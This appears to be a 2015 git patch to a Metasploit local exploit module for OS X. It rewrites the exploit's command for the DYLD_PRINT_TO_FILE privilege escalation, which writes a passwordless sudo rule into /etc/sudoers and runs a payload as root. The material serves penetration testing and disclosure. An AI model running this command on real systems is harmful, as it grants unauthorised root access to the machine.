From 165cb195bf8a46878eb1dad324803b65c24cc238 Mon Sep 17 00:00:00 2001
From: joev <joev@metasploit.com>
Date: Tue, 21 Jul 2015 22:47:52 -0500
Subject: [PATCH] Remove python dependency, add credit URL.

---
 modules/exploits/osx/local/dlyd_print_to_file_root.rb | 8 +++-----
 1 file changed, 3 insertions(+), 5 deletions(-)

diff --git a/modules/exploits/osx/local/dlyd_print_to_file_root.rb b/modules/exploits/osx/local/dlyd_print_to_file_root.rb
index 8a68275e8f..6441915fe0 100644
--- a/modules/exploits/osx/local/dlyd_print_to_file_root.rb
+++ b/modules/exploits/osx/local/dlyd_print_to_file_root.rb
@@ -25,7 +25,8 @@ class Metasploit4 < Msf::Exploit::Local
         'joev'          # Copy/paste monkey
       ],
       'References'     => [
-        ['URL',   'https://www.sektioneins.de/en/blog/15-07-07-dyld_print_to_file_lpe.html']
+        ['URL', 'https://www.sektioneins.de/en/blog/15-07-07-dyld_print_to_file_lpe.html'],
+        ['URL', 'https://www.reddit.com/r/netsec/comments/3e34i2/os_x_1010_dyld_print_to_file_local_privilege/']
       ],
       'DisclosureDate' => 'Jul 21 2015',
       'License'        => MSF_LICENSE,
@@ -43,7 +44,6 @@ class Metasploit4 < Msf::Exploit::Local
     ))
 
     register_options([
-      OptString.new('PYTHON',      [true, 'Python executable', '/usr/bin/python']),
       OptString.new('WritableDir', [true, 'Writable directory', '/.Trashes'])
     ])
   end
@@ -69,9 +69,7 @@ class Metasploit4 < Msf::Exploit::Local
   end
 
   def sploit
-    %Q|#{datastore['PYTHON']} -c \\'"import os;os.write(3,\\"ALL ALL=|+
-      %Q|(ALL) NOPASSWD: ALL\\")"\\'\|DYLD_PRINT_TO_FILE=/etc/sudoers newgrp;|+
-      %Q|/bin/sh -c 'sudo #{payload_file} &'|
+    "/bin/sh -c \"echo 'echo \\\"$(whoami) ALL=(ALL) NOPASSWD:ALL\\\" >&3' | DYLD_PRINT_TO_FILE=/etc/sudoers newgrp; sudo #{payload_file} &\""
   end
 
   def binary_payload